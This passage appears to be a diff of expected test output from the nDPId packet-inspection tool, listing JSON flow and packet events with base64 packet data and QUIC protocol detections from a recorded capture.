nkfHnaTIQA9b0kFHyqiee8gwXA7SB4zEGStKbfX+Xbd7g69KwswEs89ObtiGhZFpjbWTpwnRcI37GAOjv5pgd2XQz9GL44DG\/Ek00OMz6SwbWFlAmxoWux+qNRG3HPl83lY7zEH0gjFnGpuAsctOGn\/CIgy+CcWiM9zeH26eSXIULjy6o2ia6cosWL5oxm4nSmaOz1jSNsNYx\/IuznZBNLujicdVabLMIwM5jHV5RNtJl7ORe2vMsPayIVVzDvXWDnuN4jRMZKSKWRDE7oTL2N532z74L8ugCqSdHwRCSsBvtnIezk0Djtg=="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1603816434699,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434699,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAFhRAAEAR9f7AqAGAEr1U9dUqEVIE7BnSwAoKCgoIQzGFVS1wWEYAAETSpZ4u7UFA8Ku9qqY5kvFyNpSxiT1VV17cPvqBwMv7ghXKw28SABJKpVUQZhos8gZxtncfEnCPtRM8w32S0cMZDs5YJHMDp+qFqUFXljAhASDeFUYMjqqmqK2xXAN3z8w3vQiOdFiUtKcYWIVDP\/7fu1wx3cHjtnddQmoALaCYC2KIbsUH1tUKq7vT\/+BVt77LwCKryVjemBqkvXXluDjghTk40ivSQ8jJyGleEHicaKXla1GVH498NloK14kN7wg0ok7tb2sKhAfFsmt0dyCnuo0IC82\/BgTcTshonNbNn8yhRQBgaJANTlBk2qWY0ux\/DsdHPsovpEqFcqjpqtsKjJ\/5p6SGXORi9dQLphct9xf1v+6F1wTFVWPe3eHdsSOyp\/BwELawr\/f5+1egKWq7+4mbOVH+FCDZRkNVIFyH23guM2L5ae29avq\/lWL8pVDtTjf8abgfWtxqcSisE4YkAeGaq1eE5OG55ZyClHKNDn4L9XZjjbN9CQ1GCe\/OFVXpMI2PfEiWcGmIKeNgYRq4gzlAZODLuPV4QBEq7ZKp+5NVSaLqgSfrcH6xV4wE+0j7r5VEhvr2u6n\/\/bPNSsyoQaXU5+q7Q0w0lQEj77lMwQmrPw8Gljv7480G9NdUwkd\/\/p5S1RtQdUh\/qH46a+7aNhOrRHoFY0Uu4OeMbqyUyS5uevO+F6ddSemZlHL7dBD608g5QoisaEMsylH8q+6GxQ3RHsnKKd6RLtVMJcIb3s7eslhdiZbkyC8WugF1Uqbss8ag8jYafm2G3uWVNTOT2Al+MzrSr8taRs+g5iy1aJrDEMOzdQltsGCgG+PytPM2beF4Lq0IbrxQNCgE5IJ8\/Y9zeDmnJ4YuPZxOPAfYb360+E01gUjgcPnkzGMH3BDGaQWI5R9EypmAunCrFBomcVpqmknXQt3kkvX2OcNmQNIJtzXRbps8SEeNZRyPGf\/u+Vt+vdAKZlK9BUH2ROm9VEktt\/tTi8rHZSmWXH5uaAhoAcd2e3heLdg8ch4sYkqsJ1RM4Bd84Sjoz2WT\/JoF5Jn56aKdYJgDXqR10AhI9yS7PKXqAOUJVXWVnPWUzccZcD251mjyMn\/3GgjEsaksW4aLFNi7f\/QSOqeUIKFWMvnizPSh25WGY5rgFsH51tkf6hz04KlSxRXrJr0LIOYpZWWk4Z9QNd1K7akZKN59RDZMEAAGot\/SFcMVuXXKWbOlkRF3PR6IvnUq9PUtkadRAtAQNhw2A0EhGpp4ig24HdCqTnTlX+RSyn91Y962otVZtd4BhAeT6BQzG7\/NfJ9QU0qM31UlaB1H0R3mj33T6fLRu\/gftOixAPS4oO8hH1yfhcS8101GVhNDngCpOFPDr4rVR5IXS0BzEmSymuwkNKBp\/eXteAUsH19jQgtpJlB\/27Cf644Gbzfhi6gaDA1HPNpmXHxNHTWNp3TatC1i7mgiF\/z3wnwpcgZfu7NgfWsvkOlTH1JrhvlpguHwOE8X6csJxnEP2vFDhgFZ6S\/l6TWUOJpertvpldvGLMawH9EAcvDIDM+HIUbHJDdTMzgDd9oEnVJHFpIlh0JUOzKA7NaFr5ofLRvRbxomK6JpYR2wIpU\/OYM3aMfHBOnsu4q\/k76iU5zYtsHGX5zTrd9syVHbfA=="}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01008{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1603816434705,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1603816434705,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3PkpAAOIRsJYocL88wKgBgBFRtfAAI3\/u0QAAAAAACFIdWLoQ6nMg\/wAAIP8AAB06SjrK"}
 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1603816434707,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434707,"pkt":"pJGxgjQ5PKn0qB\/sht1gB7v\/BNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUr3wRUgTYXLjHCgoKCgi+3m+0woW7wAAARL68vqjG4rI\/AvdsCirEkqkyqlwlEk0N+rawpRZGeCeIU2ZO32fsIEz3GXMviYe+v0IBqeytpgNCeytK9t+KOjotJ7QVqpveJICd7IlMjO1HSAYVU5lRgXMoT+y5Fi2RUxr4qo\/CS3kZAFjeRFuCIjbZwm3OtOHC+vVlVA\/Vw\/zluUbCb4Z9OC05o\/XWJAPFWPOrEt8\/bTpMWLzNYr6bh2AAai1D3O2xoHVdm8ri3GSO8bUq2pxMjIn3ptNmbrkSU87wQZXGqhVeWh1ZsC0DBFqUluwXb0pMgCqpEO80Nhq5+u4y4i3hGodT0H1FKzVcs3ew3eq9vaguwDBdaKE4exJJv6RCncKSyg4heYydolHckhPW\/oY2HqheA4pFoO8ZtX95wKBFjVm9bJpYTJJY\/z31z+aUhWVmurEfLmnYxlCSy12hLAruC+gNCD8kQ\/MW4jyBAG6d7BTS1znq6T231\/W7l3AXMCvXfMcFqFuj+gmi\/S9kywNWZ1fPa34hHlg7mTIWR7jlUo6tzEfq2oqDEs+5yTslMb5FZJK8ldyYKgyBcGRm4I\/ToW88j5u17EMJLsfUqwGMs8bmd2UsI3BzwJywAmNYdLVpOCfPHEMiC8WRAAlJ3Q+5SLhd9OVFXGtu7O6XRhOsbmI08WdrJBm5J9ucdgzWkbl3i\/2eDZiYxTYiiBKrxh1bpbDEXg0VTkBcE5jASPmJB6nxZm61WNxz7BBfHP5VadrI26UgUPsDMVwEUXD\/xbFcS2J1PJleFnNI2j+1DmMCTg5N9ExM1u3\/T+Y0uyk6l54KxtzqSgjBsg\/XhFcM\/ODubgSuXCIsXFgZYQWzYGSVjfGtlg9HMWTHqZ2juNRwZqE5L2Y1hMws3fsY1ili8zQQG6pzQd9m5PP\/4DGWVRfKxQ1ZOXjzlNFvAo1T8tuTM\/f+7uMOnSwbTJyF4JRbDwJLDbu2BiW4DyD++iUHI1TX2h0xwwlOfDtDU\/XKqzZV94CRnghKvgLSuVmReTC4nhbhAh1QzzHb4eVcBbud+vGs+t+FDW0s9Oe\/hnHEEnZnUGinZBTzGSWQRNGZp3cg0jUT4QPjdPy8XyC\/POLdeCDrPUB9mDaW3W7rOPVTXvP4IQV+x5zM0ESasNezQs+QGprgL1EDIBS8hvpGgXPlFZ33Fo7w2YppnMED08hMlvAS6uJ4t8YNFbTXcL5HnggJFHBH27Bm3yvE8hbfH6SwVufZ8xM+Tw3qfg4V3lxg8P8AwO4P99Fk6O5149Oq6tAEtMX+WnBYLaxWrBiKCCuc5plEPAU9\/ZoPaf8l47lpmb56KdTriyN73TanAKwfbP6jIuj4uNIxQka2RGbqyo\/uLCe+FVRjf9R6E7hPl6i9FsmDl51lDdfvDGWrftns8EcWHuJT1pCO7UIHJob2JLCsxavgPAwXAF3a5o1+uVFCKwWrw3snRqgYx5CEEXaScXy50PTK\/knIkowD2tWEjgiJ8xxxjFamG8tuawm7Urqq2+BqDf1V3I5W+o4QxOSaFEJ\/SP7Wg3EEs5WP\/+ds9hapCjPQlUIlkyNKi8R+ri6pcpgmc2WXtbdLyKWIrR+mhOTL4VpBkPN\/EhoXvYOWO65B7Ac2ZRH43fZmgo68Sg=="}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1603816434709,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1603816434709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA7AABAABwRNNgSvVT1wKgBgBFRqdMAJz2HgAAAAAAACN6xPRoCi6ch+s6wAvrOsAH\/AAAd\/wAAGw=="}
 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1603816434719,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAschAAEARJZfAqAGAg58YxobPAbsE7L65wQoKCgoIJv2XczUh4RIAAETSm4e+jGeUlE\/B12fljD+RqcpH47cYVTGlgRrNPB1pt4i\/tbOCC9Ip3Az5ZlXd\/FK3y+qA0RLTj+Hs3M0j8vRCArTbVM4C5NgRxsbhmviOgStjfj9\/bYsZv\/EjOBw1tJ7JBggMh5UbD2IApoVeQbXiGPK49HtmmZ2e8vNh\/DENBlDkfNiA\/Ze5qo3h724av1SIVZrOuvswt3oWie0bK5Roue+xJHmSYlIdNZfnzXpwBh7c35jaMUWDvYBeZmckm7kJc\/YlpNj25UQZsKAQzZSxGyFkwPWE1VZIIf2sR\/CiM5RFNmS8PgkHq67u5CQ3Sonb6Zl53+rO66OPeJhUkGQNaSql8mMy7iu+inJtNa+Jv8r+Mk+hsReHOd3O8emp6fJ1y9UM73fh5DirDtvnZZ3V6jRJ2r4Rygc+0kMBn4CyZ+getScc\/+R2siF\/4EkcSN\/DfCIEwaf5cBdqU7sUr9jhm8ebduyUf8MMp0mo8YLH5Ld6gayewdIiX7e5MgOtKMtgw+6gQh+Bv2MsHuSZkTMTDQf6U2V6WVpP0Y9J+TKxzWfaCPfnLyfJhAvO09EXRL4v5CauDRrgK66O64n5FFSoPkt\/cTCu2ZrnJUnl73ZUh5IMHcF5qrpyNgwYRdzmLOBKKUcbZsDmgTWWmVQic025bFbbeJANUemP9rPrhK8vpdcFoj5tc09KJOg24DVw0N\/8s0k41J4q5XkRqvAq3Jh031h89LKhx6BQhfHBc1CWUzEmpurvpV2Ys4EtVyEOa76yxKI9JcwQIwxvIQGEJ9wsNhbJGOcCGN65fV293I4+Q6O6oqi3DRDkz7R3WSxRmE3ALQUURzNbLPzkf5OpbRxMjRgBCXiLLxDLAMGYwM3F2kI+ZHH4x55d95IB1d\/psHRZShyVEYlzUKCnwu29d26MEawfpZVAaMzVRo7xXV35ZRY1D8\/9qSuz0fyLsjjlwkVcHKzvWu8cUA31sZxhNy8BdqKz2pVYPgrewKlXoKgRl99L31koA071JJjVhvzH\/gU32UecgmYeQp250l9S+wco1ff4R4UyUmOfphDkNe9Tg\/fRpjxgKleIR8kU42W8ME9YzuK+U6l+SwzLtodLt+wCvEs\/5vVCJoajkAEX1WivqyUrV84SFPKxXwpiL7TWr5xgs9A6ntAG+LEQ4Fzm\/5n84NssQOABVYGxSC+XA8kEi5T+j7oP5Z\/shgDlJzIXGmWwZLuGT\/FxXFjW5dDx3DqqqjLeUaGgzxk\/EyBCH1h+zMLqNGXZu5UCHMlMD0h27AhID+7gDIkyKn3TFzqvA52QgVRJ5KzL9Mb0vBqkit66U3SK0k0xi\/SfXE85fTw0NQH2x4wd\/v387iGFuVPBH6D0J7PwX5flRLQgBtOy5jnJbhc6rzs0BouQP8a1FymWYQx9YUWzK8DXbNzSVWzXnmMxjgztNz1o7b+kh5m6wUcvmLd6ZGQW6FIkZrd0dtEs\/RrJ1+OEeg0MfVSwR9Ik1PmVJoBjjnSVS\/EB5t+GQt0btx30I4eSEVuRu2nS\/9zrg3dvua9zEzH6y3wCr08vFuCZT1u8r3v5iOQmHyKv5pfKvsINf\/+Z3UqZAAlmAb7gj\/svvnlt+IBIlM\/2nf4NpSTCux5l816mDS9Bl2mt29n21gH0vw=="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1603816434721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434721,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAzsFAAEARXhTAqAGAilu8k5wnAbsE7JrHxQoKCgoIhyfaf9ET5OIAAETSThHzecvOQHDw4M1KEvEdEUCr7CAD3OCoyACaSfQrzochTChRx6wrvVz+n+iOMS1T7uOrLABH\/lkEcgzaWAuVRzM5GGhP0QAKdeAxNm0AsijqoG67hGFscKpx5Av3K9sq9rDX7Y\/VGCtKE++QbiaTUGCfsHrykmsrI7QPeSxlf3ybNOigAkts1eOpMwz25k+b9PnMwdGgxKqc+p7n+EcjPFQejHtIcCrVrKASMN5dFF0N\/aceKWgkpv55cG51Qbpmor1iK5rkX+Jp2MWmVKxJJKA6VEfDmOs8+rh9\/bYDHg0cT0TQf4Zr2hLCg6RgKQkQcpxpjnqjjVnWbgl6v1vpjXEkfqOp6LQ7SyRj3OKJU+CC+q8T3ZrAxjtbgQTH6BSqNj5efXKABdLu2ZE9S1a376exw1gxC4aD7EfQxqzjGirRnUARwvI2VMbxxc2dHnrZzXTVUrVa81Vp5nVMETLO1bny7V5SddubE07uIzwFndMmsYTjkTJwD5XPAMks1RFaNVtVW04V3zer0QaCSFmPpOrKA2ENZYUXRl+1Ms5r0ujaH\/BvGzVlt7DDNrWHHosR4VC\/ma1LSnbA+WH2DeEaYdOBu9k38i9r4ijFtLZ3F8QT0b+bWuRxlbf8JzOO6XJygAjh4eIcY9Ifn6Ag7e30VziB3U79j2fB4F\/Mt+Uv+l2lFBFVyIRYWLQl09QlzkOdaohOuoVGT+vunC1+0eAqFF3oxCobr0gBT9\/9LcLUFdypCpP4\/SwPWvfF+zqYocBjePElav4+tGCKrt\/mkRyKvh\/nYulR4dFSm9pIzgjYoT78ZAE2lNPXyk6\/wkm6W4x\/Hk6rPPDi5szKTPrrB0V1qBTNahyFnb9FvHoXB4fK89PmOZMp\/yecWo4kP\/4lCl\/0sXffd\/0V5mQwriutI7UUKJmZLeDjdWC8J0aU6CLm\/SAEqxf88fV5pVMs0AYkAPp\/9j6IANm3UDJnqgRh8cV1\/31bcLPsjWchpJZggmMYkHI2wDN3Sl9zv+cjKCe7+jCl4jW8L\/ekF6HvMfC0eZ4nbal4FyAx8lo4Ue7X8ccf91\/AaqxYlfnlLzjGSpAQtt5baUgZHgnmszaHCnFbo2HHjdmmeu9Y473RvYemO3l50MKmLZG8lmdXQYv688u9bT4irxXqmbHi\/KHwUDOgFg0j8s0Y\/EmH\/pUgZCvgDFCtWtE6OW\/Hyq+5Cq\/HLgwB+IqdME7iVh3EnO3YfKXA50YgeqN5yY5ZNK6jO6v4bbk7\/wLtWdLdrB98VjrtJxA3EfSPn3vx7DFBmIWTYqLE+TpavUx0HxH19PjHereWaV9o6Cgs6+3PWf4tHc03d1rwK6f0xuBoogN97dsTvTJpqwpURumirQKVo3x+5CvP7oOU957Rt\/07vk0ZfIXTZECv+R5Y+R5gZfgoFzxzcENMe3qIbQZk8PFnchoS4GL\/8Y3H5Zb9Ei56qun9YxSW1Biasm72GWT1NwX2gR1bQjPxGosYAY\/6xPeLmkDAtOOTQ4g1vxcLLP8ZY+VaGsUNC8YbA40ig6LjBd1CD5E8RiAqEa9E2sD4lNd4+rToxZT0gmByW82p\/TzmPxSzryYrUGNjoU4d233l88kz7+WQyjC7tX8oBOiRLI2cu8Cgzkq+Qerk7O1ahg=="}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1603816434721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434721,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApPtAAEARh9rAqAGAilu8k8YREVIE7C6GxwoKCgoI6izyia7+eS8AAETSt+QbRbxl9Fm+cZhPehbbyuY4X98qiUiG97DtvQxOnW4mI8Cl3JV0HG80thoAdqQu1a\/K85y1Ygj5RP4637KMtJIeTQw7yPPnXHP0zU4RjZ62TRhNYZ6eNVI8rDTqX1U17UTGdzCJDQ6P3bwSFn\/hecgMOHAgJBSmXtzvmrL3MX129OuthefAiwdrij8dlZ+1POyInLQ1s4zElf1Qtel5JDZstCNGEQMu3Yksb7Fp8N8QxRhMiYahy\/rNZuX1sDo+S8Kt0f4nxECcA68o5O3j7RZ0UkQbCk7TY7P0k6hNhGbG8k6dzns2FDeBH2AWR18Xa6EbgQ+OE51BsT69F5Mw6Qv4zVxrj3nvm+j8ViswJ2lGHUVv\/wERdeEUkom6scesBC8GBF5oO+ERsonLbBlk0k64qeF0Mq16CQ2Tk4A1XJsEkeKkk13FfpgZ4xmju7ZvBKg6vyEj2GwP\/prZKaMYyek4cy3+1jkURWmaCVIJ30zt\/SxehiygkHDUiHnhD4bbKnxoZnxLWYNZlzO2olSPOXGBVUKEmol6Z1tK9f9JtrTB1m6tWsGbvwGSZA1y816T1+9q3kC45+v+o6ZmsHQTQIKTABYPnt8Wtf0hV33bQFBnhVsk2Gxdzjdom1ZLnDG+UAt4D1lf5cwBPUEisJIkPJBWS+rRvxC4DSNxciNVRjBHHot+7iiljC6QJOc8tv9ovBuMSSgCyDMe9n6HZtnwKuFrJijK9sqICpmLcJkRKxtUrOmfIadJlbAhdaPlAaOtL\/gMLjBp5boNC8pc8oLdF5gMKu0u6JrSWcFM7DMe\/SsSxMHlXi6oim5b0Bp8EthbxMMoLevrzbay70814zyI4WTOGY9vs32q1YnE4xZtSITnSbueYtYs5y6gAD+78I0tPBp\/bsV8QK5jclDqhGJvB+AVr\/WiMRT4OB9wSBwZXgYvAqWVfPSOkoHm3S6eJCcDs9F2x+hzEigXYsc84EvM4A1FCIAV7dO57go8nEQBW53ScAoMrWnMLYP0jkSI6suyGhiNp+h\/hClT+r\/Op92bWLS0pmZuvcNoTh4NLNKHapDtFwkQScIFRJ5B3b8fbGgludLcc2EtUA94Vc8QXVeNTIe0oP4s79m2XlQxy5y6O6OOkdY\/eUiYY9ApibduptWlMeUaNEA943We+rSbYXAEwOAraCMgbo\/PxzNUEPSqGnFDmTG9n+KnmYQi\/Alvs3QfYLLJt92WPsYBjHomiJjYWrbbdpMsFSvM2JeGnLfPMCegUq7+rsZIXjLTFB9Be+d9JUJ623MReNEYoMx8+sr6dCv2Gspxsl42k\/5L+7+ZDtFPo3XT6sEDxDYJvaEBjW39mG5b7C2beKtDSKu9M+wzWHdHw90KV7KS6\/DYWbLEkLOhVtsHdqM\/8MkUyr0noHt59IlTRvNBTWfpVdPC4nFiuDekpKBrvN+3EkNvSU3PCcM3kbQrdBSuFh0g28\/mzkqSAv0ZX5bxXIyBY6lC2UEqGMZo8UOe\/BO8r+hCIJMGZ7nG2fzy\/+YOPtJrO9Mb4J6yQmY0rqVI+EvjNDPprLHMCYe5Q5VOAznPM\/b5ELOgKrzgym72uZNPWn3W6OK4K\/yCjCGoXsltbqumaaP0\/hRyLF6fCMMUuvnes1g8uU+5d9gQLw=="}
